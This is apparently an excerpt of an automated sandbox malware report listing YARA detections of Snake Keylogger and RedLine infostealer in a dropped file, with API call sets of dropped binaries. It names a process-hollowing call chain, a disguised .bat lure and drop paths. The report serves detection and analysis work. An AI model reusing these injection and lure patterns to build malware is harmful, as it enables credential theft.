              Source: 22.2.xzeheenC.pif.34ca0f08.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2e330000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.23786478.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2e330000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.23786478.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.226c0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.226c0f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 18.2.Cneehezx.PIF.214d58a8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 22.2.xzeheenC.pif.33965570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.33965570.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 26.2.xzeheenC.pif.23785570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.2.xzeheenC.pif.23785570.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 18.2.Cneehezx.PIF.21496c78.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 26.3.xzeheenC.pif.2072dd00.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 26.3.xzeheenC.pif.2072dd00.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 22.2.xzeheenC.pif.34ca0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.34ca0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.3255c896.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.3255c896.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 16.2.xzeheenC.pif.2c595570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 16.2.xzeheenC.pif.2c595570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.2.xzeheenC.pif.33966478.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.2.xzeheenC.pif.33966478.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 22.3.xzeheenC.pif.30aaea30.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 22.3.xzeheenC.pif.30aaea30.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000016.00000002.2763633024.0000000034D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000010.00000001.1581941889.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000001A.00000002.2726733311.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000010.00000002.2726799985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000016.00000001.1707089110.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0000001A.00000001.1780155418.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000001A.00000002.2764181623.0000000025170000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000010.00000002.2763700110.000000002E330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 00000016.00000002.2726848233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: F.O Pump Istek,Docx.batStatic file information: 2966423
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,4_2_00007FF7AB1388C0
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB138114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,4_2_00007FF7AB138114
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB14BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,4_2_00007FF7AB14BCF0
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB137FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,4_2_00007FF7AB137FF8
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB151538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,4_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB13898C NtQueryInformationToken,4_2_00007FF7AB13898C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB123D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,4_2_00007FF7AB123D94
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB1389E4 NtQueryInformationToken,NtQueryInformationToken,4_2_00007FF7AB1389E4
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB1388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,6_2_00007FF7AB1388C0
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB138114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,6_2_00007FF7AB138114
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB14BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,6_2_00007FF7AB14BCF0
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB137FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,6_2_00007FF7AB137FF8
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB151538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,6_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB13898C NtQueryInformationToken,6_2_00007FF7AB13898C
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB123D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,6_2_00007FF7AB123D94
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB1389E4 NtQueryInformationToken,NtQueryInformationToken,6_2_00007FF7AB1389E4
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DEC964 NtQuerySystemTime,RtlTimeToSecondsSince1970,7_2_00007FF792DEC964
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_02908254 NtReadVirtualMemory,10_2_02908254
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_029084C4 NtUnmapViewOfSection,10_2_029084C4
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_0290DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,10_2_0290DACC
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_0290DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,10_2_0290DA44
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_0290DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,10_2_0290DBB0
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_02908BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,10_2_02908BB0
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_029079B4 NtAllocateVirtualMemory,10_2_029079B4
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_02907D00 NtWriteVirtualMemory,10_2_02907D00
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_02908BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,10_2_02908BAE
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_029079B2 NtAllocateVirtualMemory,10_2_029079B2
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_0290D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,10_2_0290D9F0
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB138114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,11_2_00007FF7AB138114
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB137FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,11_2_00007FF7AB137FF8
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB1388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,11_2_00007FF7AB1388C0
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB14BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,11_2_00007FF7AB14BCF0
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB151538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,11_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB13898C NtQueryInformationToken,11_2_00007FF7AB13898C
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB123D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,11_2_00007FF7AB123D94
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB1389E4 NtQueryInformationToken,NtQueryInformationToken,11_2_00007FF7AB1389E4
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB138114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,12_2_00007FF7AB138114
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB137FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,12_2_00007FF7AB137FF8
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB1388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,12_2_00007FF7AB1388C0
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB14BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,12_2_00007FF7AB14BCF0
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB151538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,12_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB13898C NtQueryInformationToken,12_2_00007FF7AB13898C
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB123D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,12_2_00007FF7AB123D94
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB1389E4 NtQueryInformationToken,NtQueryInformationToken,12_2_00007FF7AB1389E4
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB125240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,4_2_00007FF7AB125240
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB134224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,4_2_00007FF7AB134224
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB1337D811_2_00007FF7AB1337D8
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12AA5411_2_00007FF7AB12AA54
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB13555411_2_00007FF7AB135554
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB128DF811_2_00007FF7AB128DF8
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB122C4811_2_00007FF7AB122C48
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB14AC4C11_2_00007FF7AB14AC4C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12188411_2_00007FF7AB121884
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB1318D411_2_00007FF7AB1318D4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12851011_2_00007FF7AB128510
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12B0D811_2_00007FF7AB12B0D8
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB129B5011_2_00007FF7AB129B50
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12372C11_2_00007FF7AB12372C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB123F9011_2_00007FF7AB123F90
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB125B7011_2_00007FF7AB125B70
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB14AFBC11_2_00007FF7AB14AFBC
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB126BE011_2_00007FF7AB126BE0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12524011_2_00007FF7AB125240
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12765011_2_00007FF7AB127650
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12D25011_2_00007FF7AB12D250
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB129E5011_2_00007FF7AB129E50
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12222011_2_00007FF7AB122220
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB13422411_2_00007FF7AB134224
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB124A3011_2_00007FF7AB124A30
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB14AA3011_2_00007FF7AB14AA30
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12E68011_2_00007FF7AB12E680
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB14EE8811_2_00007FF7AB14EE88
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB130A6C11_2_00007FF7AB130A6C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB147F0011_2_00007FF7AB147F00
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB126EE411_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB15153811_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB127D3011_2_00007FF7AB127D30
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB14D9D011_2_00007FF7AB14D9D0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB1281D411_2_00007FF7AB1281D4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12CE1011_2_00007FF7AB12CE10
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB13785412_2_00007FF7AB137854
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12341012_2_00007FF7AB123410
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB1337D812_2_00007FF7AB1337D8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12AA5412_2_00007FF7AB12AA54
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB13555412_2_00007FF7AB135554
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB128DF812_2_00007FF7AB128DF8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB122C4812_2_00007FF7AB122C48
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB14AC4C12_2_00007FF7AB14AC4C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12188412_2_00007FF7AB121884
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB1318D412_2_00007FF7AB1318D4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12851012_2_00007FF7AB128510
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12B0D812_2_00007FF7AB12B0D8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB129B5012_2_00007FF7AB129B50
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12372C12_2_00007FF7AB12372C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB123F9012_2_00007FF7AB123F90
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB125B7012_2_00007FF7AB125B70
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB14AFBC12_2_00007FF7AB14AFBC
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB126BE012_2_00007FF7AB126BE0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12524012_2_00007FF7AB125240
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12765012_2_00007FF7AB127650
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12D25012_2_00007FF7AB12D250
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB129E5012_2_00007FF7AB129E50
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12222012_2_00007FF7AB122220
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB13422412_2_00007FF7AB134224
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB124A3012_2_00007FF7AB124A30
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB14AA3012_2_00007FF7AB14AA30
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12E68012_2_00007FF7AB12E680
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB14EE8812_2_00007FF7AB14EE88
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB130A6C12_2_00007FF7AB130A6C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB147F0012_2_00007FF7AB147F00
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB126EE412_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB15153812_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB127D3012_2_00007FF7AB127D30
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB14D9D012_2_00007FF7AB14D9D0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB1281D412_2_00007FF7AB1281D4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12CE1012_2_00007FF7AB12CE10
              Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\xzeheenC.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
              Source: 16.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 22.2.xzeheenC.pif.33966478.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.33966478.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
